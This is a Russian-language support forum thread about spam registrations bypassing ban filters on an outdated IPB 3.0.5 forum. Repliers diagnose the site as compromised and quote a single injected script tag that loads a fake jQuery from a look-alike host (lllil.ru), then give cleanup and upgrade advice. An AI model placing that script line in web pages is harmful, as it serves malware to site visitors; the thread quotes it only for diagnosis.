Перейти к публикации
View in the app

A better way to browse. Learn more.

Дизайн и модификация Invision Community

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Обход бан-фильтов при регистрации; версия 3.0.5

Опубликовано:

При регистрации задал несколько бан-фильтров по е-мэйл адресам китайских почтовых серверов, с которых у меня последнее время идут регистрации спамеров.

Кейкапча стоит, т.е. регистрацируются, как я понимаю, вручную.

Однако несмотря на наличие бан-фильтров, всё равно новые регистрации проходят с запрещёнными е-мэйлами.

Прошу помощи.

Рекомендованные сообщения

Опубликовано:

Однако несмотря на наличие бан-фильтров, всё равно новые регистрации проходят с запрещёнными е-мэйлами.

Может у вас доработанный форум?

Опубликовано:
  • Автор

Как это "доработанный"? Я не знаю ничего об этом...

Стоит пара модов, типа цитаты и глобальных объявлений, т.е. ничего экстраординарного.

Опубликовано:

У меня автобан срабатывает даже с разных ip или разных емейлов когда спаммер (один и тот же) регается. Кажется регается скриптом, не руками. Также стоит активация аккаунтов администратором. Попробуйте ввести обязательное поле текстовое при регистрации, например: "Введите цель регистрации на форуме", а новые аккаунты активируйте руками. Сейчас фик поймешь, где руками, а где всякими генераторами случайных чисел регистрируются.

Изменено пользователем Zero108

Опубликовано:
  • Автор

У меня стоит активация администратором, но и это не помогает, потому что как-то обходят это ограничение.

Опубликовано:

Значит, скорее всего, ломаный (null) движок с бэкдором. Для этого их и распространяют.

Опубликовано:
  • Автор

Нет, лицензионный. Официально покупал у разработчика.

Опубликовано:

Я не в курсе, что там за дыры были, и какие патчи выпускались. Тут много было про вирусы в ранних версиях 3.0.0. Поищите по форуму, обновите движок. Я пользуюсь с 3.4.0.

Опубликовано:
  • Автор

обновите движок

это ж денег стоит... А потом через 2 года опять затупит и опять плати за новый?..

Опубликовано:

Патчи бесплатно раздаются техподдержкой. Стоит удовольствие 70 долларов в полгода.

Опубликовано:
  • Автор

За эти деньги я себе куплю пожизненный альтернативный форум.

А с такой "техподдержкой" как на ИПБ, когда задаёшь на форуме у них вопрос и в течение недели ни одного ответа - пусть покурят бамбук.

Я так понимаю, по моей проблеме здесь тоже пока толком ничего не может сказать?..

Опубликовано:
  • Автор

Кстати, вот и ответ пришёл от "техподдержки" насчёт обновления:

> Письмо от: Сергей

>

> Тема: Вопросы по оплате

> Текст сообщения: У меня лицензия на форум давно истекла. Хочу обновить

> движок на свежую версию. Сколько будет стоить обновление?

Здравствуйте.

Для использования последней версии форума требуется уже англоязычная

лицензия. Русских лицензий с 2011 года не предлагается.

Поэтому для обновления вашего форума вам необходимо иметь американскую

лицензию(5000-6000 рублей) + 990 рублей за продление поддержки на русском

языке на 6 месяцев и локализацию...

Также мы можем предложить вам наши услуги по обновлению форума под ключ.

Стоимость обновления зависит от размеров форума. Для расчета стоимости

заполните простую анкету (прикреплена к письму).

Считаете это голос разума? На мой взгляд они просто зажрались, так что бамбук для них - лучшее решение.

Скорее всего, что проблему топика решать уже не нужно, я перехожу на альтернативный форум.

Спасибо, тему можно закрыть.

Опубликовано:

Я так понимаю, по моей проблеме здесь тоже пока толком ничего не может сказать?..

Вам толком по вашей проблеме уже ответили в предыдущей теме, мне лично больше нечего добавить.

ПС. Да, кроме всего вам надо установить патч безопасности для недавно обнаруженной уязвимости.

За эти деньги я себе куплю пожизненный альтернативный форум.

"Эти деньги" можно было скопить за месяц в сапе

Опубликовано:

В 3.0.5 больше десятка уязвимостей.

Ваш форум однозначно уже протроянен до дыр. А вот этот код в шапке еще и распространяет вирусы среди ваших посетителей:

<script type="text/javascript" src="http://googleapis.lllil.ru/ajax/libs/jquery/1.8.3/jquery.min.js"></script></head>

Вы можете купить себе за 70$ любой пожизненный движок, но речь не в пожизненности, а в регулярном аудите безопасности и обновлениях. Своей безалаберностью и "экономией" вы довели свой форум до состояния, когда его дешевле удалить полностью и начать с нуля, нежели вычистить от накопившейся за несколько лет гадости.

Опубликовано:
  • Автор

"Эти деньги" можно было скопить за месяц в сапе

Можно быть и повежливей, давая советы о способах заработка.

@Ritsuka, имеете в виду удалить вместе с БД?

Подскажите, в каком из файлов находится этот вредоносный код, и можно ли мне его удалить?

Изменено пользователем Сергей К.

Опубликовано:

Ваша версия скрипта не поддерживается уже полтора года. С тех пор, если мне не изменяет память, выходило больше 5 критических патчей "на всю линейку". Плюс неизвестно, ставили ли вы патчи еще на момент, когда поддержка вашей версии не была завершена. Чтобы починить ваш форум, вам потребуется квалифицированный специалист, который:

1. Потратит много времени на анализ всех скриптов, файлов и базы данных на предмет посторонних включений (судя по виду внедрения кода, у злоумышленников есть доступ как к файловой системе, так и к базе данных вашего форума).

2. Портирует вниз до вашей версии все патчи безопасности.

3. Пожелает разбираться в откровенно устаревшем скрипте (и будет иметь на руках "чистый" 3.0.5).

Вы на таком человеке просто разоритесь. Или прибегните к услугам какого-то школьника, который, конечно, наобещает, что "все будет ок", но в итоге ничего не сможет вам гарантировать.

Более логичный сценарий:

1. Взять актуальную версию скрипта (3.3.4 или 3.4.1)

2. Обновиться до нее с предварительным удалением всех старых каталогов и файлов, кроме uploads (которую так же проверить на посторонние .js, .htaccess и .php файлы).

3. Поставить новые версии ваших любимых модов и хуков.

4. Пробежаться по нескольким таблицам в базе на предмет посторонних "хвостов".

Это будет куда дешевле, проще и быстрее, много кто с удовольствием возьмется за такую работу и легко справится с нею. Новая версия вашего скина у Фисаны есть, и все свежие патчи прилетят к вам вместе с дистрибутивом. А старые скрипты забудете как страшный сон.

Создайте аккаунт или войдите в него для комментирования

Сейчас на странице 0

• Нет пользователей, просматривающих эту страницу.

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.